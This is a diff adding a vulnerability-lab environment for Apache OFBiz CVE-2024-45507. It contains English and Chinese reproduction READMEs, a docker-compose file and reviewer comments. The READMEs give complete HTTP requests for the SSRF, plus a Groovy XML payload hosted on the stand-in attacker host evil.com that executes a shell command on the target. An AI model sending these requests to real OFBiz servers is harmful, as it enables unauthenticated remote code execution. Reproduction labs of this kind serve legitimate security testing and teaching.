BIN
ofbiz/CVE-2024-45507/1.png Normal file

Binary file not shown.

BIN
ofbiz/CVE-2024-45507/2.png Normal file

Binary file not shown.

View File

@@ -0,0 +1,86 @@
# Apache OFBiz SSRF and Remote Code Execution (CVE-2024-45507)
[中文版本(Chinese version)](README.zh-cn.md)
Apache OFBiz is an open source enterprise resource planning (ERP) system. It provides a suite of enterprise applications that integrate and automate many of the business processes of an enterprise.
This vulnerability (CVE-2024-45507) affects Apache OFBiz versions prior to 18.12.16. It allows an unauthenticated attacker to perform Server-Side Request Forgery (SSRF) and potentially achieve remote code execution.
References:
- <https://github.com/apache/ofbiz-framework/commit/ffb1bc4879>
- <https://xz.aliyun.com/t/15569>
- <https://paper.seebug.org/3228/>
## Vulnerable environment
Execute the following command to start an Apache OFBiz 18.12.15 server:
```
docker compose up -d
```
After a short wait, you can see the login page at `https://localhost:8443/accounting`.
## Vulnerability Reproduce
### Server-Side Request Forgery (SSRF) attack
Send a POST request to `/webtools/control/forgotPassword/StatsSinceStart` with the following request:
```
POST /webtools/control/forgotPassword/StatsSinceStart HTTP/1.1
Host: localhost:8443
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
statsDecoratorLocation=http://10.10.10.10/path/to/api
```
### Remote Code Execution
Create a malicious XML file (payload.xml) on a public server like `http://evil.com/ofbiz/payload.xml`:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<screens xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://ofbiz.apache.org/Widget-Screen" xsi:schemaLocation="http://ofbiz.apache.org/Widget-Screen http://ofbiz.apache.org/dtds/widget-screen.xsd">
<screen name="StatsDecorator">
<section>
<actions>
<set value="${groovy:'touch /tmp/success'.execute();}"/>
</actions>
</section>
</screen>
</screens>
```
Then replace your malicious XML url into following request and send:
```
POST /webtools/control/forgotPassword/StatsSinceStart HTTP/1.1
Host: localhost:8443
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
statsDecoratorLocation=http://evil.com/ofbiz/payload.xml
```
![](1.png)
The command `touch /tmp/success` will be executed on the target server, demonstrating successful exploitation.
![](2.png)
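Review bot: `Content-Length: 64` matches neither body in this hunk (`statsDecoratorLocation=http://10.10.10.10/path/to/api` is 53 bytes and `statsDecoratorLocation=http://evil.com/ofbiz/payload.xml` is 56), so a client that sends the header verbatim rather than recomputing it leaves the server waiting for bytes that never arrive; drop the header or note that it must be recomputed. `evil.com` is a registered domain, so use a reserved name (`attacker.example`) for the payload host. The SSRF section ends after the request without saying how to confirm that the server fetched `http://10.10.10.10/path/to/api`; a line telling the reader to watch for the inbound request on a host they control (in the lab, a listener on the docker host) would close the loop. `Then replace your malicious XML url into following request and send` should read `Then put the URL of your XML file into the following request and send it`.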

View File

@@ -0,0 +1,84 @@
# Apache OFBiz SSRF 和远程代码执行漏洞CVE-2024-45507
Apache OFBiz是一个开源企业资源规划ERP系统。它提供了一套企业应用程序集成并自动化企业的许多业务流程。
Apache OFBiz 18.12.16之前的版本存在一处SSRF与远程命令执行漏洞未经身份验证的攻击者可以利用该漏洞执行任意命令并控制服务器。
参考链接:
- <https://github.com/apache/ofbiz-framework/commit/ffb1bc4879>
- <https://xz.aliyun.com/t/15569>
- <https://paper.seebug.org/3228/>
## 漏洞环境
执行以下命令启动一个Apache OFBiz 18.12.15服务器:
```
docker compose up -d
```
等待片刻后,您可以在`https://localhost:8443/accounting`看到登录页面。
## 漏洞复现
### SSRF漏洞
`/webtools/control/forgotPassword/StatsSinceStart`发送以下POST请求即可
```
POST /webtools/control/forgotPassword/StatsSinceStart HTTP/1.1
Host: your-ip:8443
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
statsDecoratorLocation=http://10.10.10.10/path/to/api
```
## 远程代码执行漏洞
在公共服务器上创建一个恶意的XML文件payload.xml例如`http://evil.com/ofbiz/payload.xml`
```xml
<?xml version="1.0" encoding="UTF-8"?>
<screens xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns="http://ofbiz.apache.org/Widget-Screen" xsi:schemaLocation="http://ofbiz.apache.org/Widget-Screen http://ofbiz.apache.org/dtds/widget-screen.xsd">
<screen name="StatsDecorator">
<section>
<actions>
<set value="${groovy:'touch /tmp/success'.execute();}"/>
</actions>
</section>
</screen>
</screens>
```
然后将恶意XML的URL替换进请求中发送
```
POST /webtools/control/forgotPassword/StatsSinceStart HTTP/1.1
Host: your-ip:8443
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
statsDecoratorLocation=http://evil.com/ofbiz/payload.xml
```
![](1.png)
进入容器中,可见命令`touch /tmp/success`已经被成功执行:
![](2.png)
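Review bot: `## 远程代码执行漏洞` is a level-2 heading while `### SSRF漏洞` just above is level 3 and both are subsections of `## 漏洞复现`; make it `### 远程代码执行漏洞` as in the English README. `Host: your-ip:8443` here versus `Host: localhost:8443` in the English file; pick one. The `Content-Length: 64` mismatch (bodies of 53 and 56 bytes) and the `evil.com` hostname noted for the English file apply here as well.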

View File

@@ -0,0 +1,6 @@
services:
web:
image: vulhub/ofbiz:18.12.15
ports:
- "8443:8443"
- "5005:5005"